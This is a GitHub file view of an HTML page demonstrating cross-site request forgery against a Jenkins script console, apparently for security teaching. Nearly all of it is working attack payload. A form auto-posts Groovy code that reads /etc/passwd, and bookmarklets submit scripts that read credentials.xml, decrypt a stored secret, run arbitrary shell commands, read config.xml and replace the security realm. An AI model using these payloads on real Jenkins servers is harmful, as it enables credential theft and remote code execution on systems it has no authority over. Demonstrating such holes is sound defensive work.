-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathcsrf_demo.html
56 lines (55 loc) · 4.27 KB
/
csrf_demo.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<html>
<head>
<title>Security: CSRF Demo</title>
</head>
<body>
<form method="POST" action="http://localhost:8081/script">
<textarea name="script">
println 'I hacked you.'
new File('/etc/passwd').text
</textarea>
<input type="submit" value"Submit" />
</form>
<details>
<summary>Demo links (click to expand)</summary>
<h2>Demo link <a href="https://en.wikipedia.org/wiki/Bookmarklet">bookmarklets</a></h2>
<p>Bookmark these bookmarklets so they can be run on the script console page to show examples.</p>
<ul>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("")">Blank example</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("println 'hello'\nprintln 'world'")">Multiline print Hello world</a>
</li>
</ul>
<h5>Security Demo</h5>
<ul>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})('new File("${Jenkins.instance.root}/credentials.xml").text')">Read credentials.xml</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("import hudson.util.Secret\nSecret.fromString('{AQAAABAAAAAguhcOTpI3ac2aBGO+GNvqpdgViNEjlrHGFuV+oI9mvh1DSIEK4hVZswvYKugpNGkG}')")">Decrypt secret from credentials.xml</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})('"ls -l ${Jenkins.instance.root.toString()}".execute().text')">Execute arbitrary shell command</a>
</li>
</ul>
<h5>Configuration Demo</h5>
<ul>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("Jenkins.getInstance().metaClass.methods*.name.sort().unique()")">List methods on Jenkins.instance</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("Jenkins.instance.securityRealm")">Call getSecurityRealm</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})("import org.jenkinsci.plugins.GithubSecurityRealm\nprintln Jenkins.instance.getSecurityRealm()\ndef x = new GithubSecurityRealm('hello', 'goodbye', 'foo', 'bar', 'dont care')\nprintln x\nJenkins.instance.setSecurityRealm(x)")">Configure GitHub Security Realm</a>
</li>
<li>
<a href="javascript:(function(script){var old_element = document.getElementsByTagName('form')[1];var new_element = old_element.cloneNode(true);old_element.parentNode.replaceChild(new_element, old_element);document.getElementById('script').innerHTML = script;new_element.submit()})('new File("${Jenkins.instance.root}/config.xml").text')">Read Global config.xml</a>
</li>
</ul>
</ul>
</details>
</body>
</html>